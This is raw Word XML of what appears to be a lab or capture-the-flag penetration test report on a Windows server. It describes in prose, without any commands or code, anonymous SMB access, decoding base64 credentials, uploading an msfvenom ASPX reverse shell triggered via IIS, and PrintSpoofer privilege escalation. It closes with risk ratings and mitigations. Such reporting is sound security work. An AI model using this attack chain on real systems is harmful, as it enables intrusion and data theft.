          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="5768" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="168AAECC">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Set up the Netcat listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4BF906">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="5768" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1628DC4C">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Trigger the payload via IIS Web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6A1E7E">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="5768" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1427BEAB">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D200452">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User.txt flag capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0237EC6F">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="5768" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A21D60F">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Navigate to any of the user’s desktop i.e. Bob or Bill</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEF832D">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="5768" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5243D664">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 xml:space="preserve">Read the flag content using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC96FCA">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="5768" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="230A5E30">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AD9F2C3">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B74BF7C">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="7208" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04B65D73">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 xml:space="preserve">Check </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the user privileges available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AD290C">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="7208" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C2571B1">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Found SeImpersonatePrivilege that can be exploited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037864B7">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="7208" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C857FC8">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Download and execute PrintSpoofer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0993DA5F">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="7208" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65937772">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DEFD76D">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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System Shell access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C7A9E4">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="5768" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A7DE497">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Obtain system shell access via PrintSpoofer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BE179E">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="5768" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B8F3ED9">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Confirm privilege escalation with whoami command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D22869D">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="5768" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B5FC2F4">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537C940">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>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Root.txt flag capture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C88960">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="5768" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2257B501">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Navigate to administrator desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248D687B">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="5768" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AF1C93F">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Get content of root.txt using PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDE43DD">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="5768" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="011D43BA">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Attack Narrative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D0770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1: Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764484F7">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This was the first step to scan the target IP address to know the open ports and services that are running within the ports that could be exploited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33764BCD">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Nmap scan revealed port 445 to be open which is an indication of vulnerability because port 445 runs SMB services that includes shared folders that should be private by default. This gives the idea that an attacker can access file shares without authentication. The scan also revealed port 80 to be open and dynamic high port 49663 which run IIS web services of windows showing that the target could probably be a windows server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A97C3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2: SMB Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F171D9D">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Since we have discovered that port 445 is open we try to access the SMB shares on the target IP as an anonymous user to see if we have any files of interest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58995305">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First of all the SMB service allowed anonymous access which shows a point of compromise. There was also a file share name that unusual and not a standard windows share compared to the others making it the first prime target for investigation of compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F157706">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3: Getting User credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77859489">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After connecting to the share name that stands out we try to figure out what the folder contains and we discover a file named passwords.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22279413">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The file passwords.txt was downloadable which could allow unauthorized access to the contents of the file. One could easily read the content of the file since it had no authentication. The contents of the file were encoded to base64 which is a weak encoding scheme and could be decoded easily. This enable the discovery of the users sharing the folder and their password which were very weak.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F0AAA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4: Payload generation and upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240F4F19">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We are trying to connect the windows server back to our machine using an ASPX reverse shell payload. We generate it using the msfvenom tool and upload the payload to the shared folder via SMB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C74571">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This revealed that the shared folder was not only readable but also writeable and mapped to an IIS web server which meant that any file uploaded could be accessed and executed with ease. Uploading a malicious ASPX file enabled triggering of remote code execution by just accessing it from the browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A2FA1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5: Reverse shell Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D81FA9">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This step was to allow us to remotely access the windows server using the payload we have generated by setting up Netcat listener to capture any traffic from the web server and triggering the file via curl or the browser using the dynamic high port for windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E8FEC8">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The server executed the ASPX code without any fail thus opened a reverse shell connection back to our Netcat listener. This gave us the command prompt for the target windows system with limited privileges as a user of that system. A user could read files change directories and look for instances of privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E560DC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6: User.txt flag capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10185EF6">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Having access to the reverse shell, we are able to navigate to any of the user’s desktop and read the user.txt flag as a valid user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DAAC0B">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This is a show of successful breach of system since we are able to impersonate the users and access the data that is hidden to others. Being able to capture the flag also showed that as an attacker, I could seamlessly execute commands on the system and detect other vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158EA25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7: Privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763B96F1">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As a user one could check the privileges they have on their system as enabled and this could help in figuring out </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>whether</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> there are loop holes to escalate to system user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9F446B">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Finding SeImpersonatePrivilege enabled was a major show of compromise since one could easily escalate privileges easily. This </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>misconfiguration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> has different ways of being exploited and poses a risk to the entire System.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0F8DA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8: SYSTEM shell access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E071166">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The SYSTEM level is the highest rank of user that could have control on the entire system. Escalating privileges to that level would allow access to any information in that system with ease.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8D0720">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With SYSTEM level access we could access every file, folder and resources in the system. This could allow Reading every user’s data, malware installation, creation of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>back doors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or use the compromised to system to pivot to other machines connected to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E235FB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Phase 9: Root.txt flag capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167AAD09">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Description:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> With SYSTEM level access we are able to navigate to the administrator's desktop and read the root.txt flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F62680">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Compromise:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> This confirmed that we have achieved the highest level of access and could compromise the whole system or maintain access for later breaches of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D1457C">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Risk Rating And Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D56CEB4">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Risk Assessment Summary</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0"/>
        <w:gridCol w:w="874"/>
        <w:gridCol w:w="5562"/>
      </w:tblGrid>
      <w:tr w14:paraId="117E4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00E67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Overall Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1442A01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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4CD475F1">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6E992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9F4E0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Confidentiality Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E3CD84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0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A81977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Complete system data access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0268F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218E3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Integrity Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07EE31F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0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B717FD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Full system modification capabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1C61E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B3164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Availability Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B5E3B8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0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="43C803C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Potential of system disruption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="48979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25B5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Ease of Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="78CB033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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B6A079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simple tools and minimal prerequisites</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="316AF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86CD1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Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7EC5E31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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55ACCAF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Full system access can be maintained indefinitely</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1C76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CA9F5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Business Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3241836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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="536B41F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Complete compromise of the server could lead to customer breach of data and reputation ruin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FCFBF02">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Potential Business Impacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537B616E">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Data breach: Exposure of sensitive customer and company data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07864E25">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Regulatory Fines: Violations of security standards set up by GDPR,HIPAA or PCI-DSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BA1D59">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lang w:val="en-US"/>
        </w:rPr>
        <w:t>Reputation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Damage: Loss of customer trust and brand damage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D59A0A">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Operational disruption: Operations stop when a ransomware attack is made</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088D515B">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Lateral Movement: The server attack could be used to compromise other systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9E382D">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Persistence: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Back doors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> could be established for ongoing malicious activities that could cause worse breaches over time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7D9395">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Recommendation and Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0A3DBB">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High Priority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD3F82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~Disable anonymous access to all SMB Shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACA1DF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~Remove SeImpersonatePrivilege from non-administrative user accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2416FBB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~Remove </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plain text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> credentials from accessible locations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4192ADB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~Enable and enforce message signing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CB12C6">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~Apply security updates for token impersonation issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AB53A4">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Medium Priority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F97C7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~Implement strong password policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7C586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~Restrict IIS directory browsing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AFA0D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~Implement application whitelisting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EC2F2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~Enable comprehensive logging and monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5F4DE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~Conduct regular vulnerability scans</w:t>
      </w:r>
    </w:p>
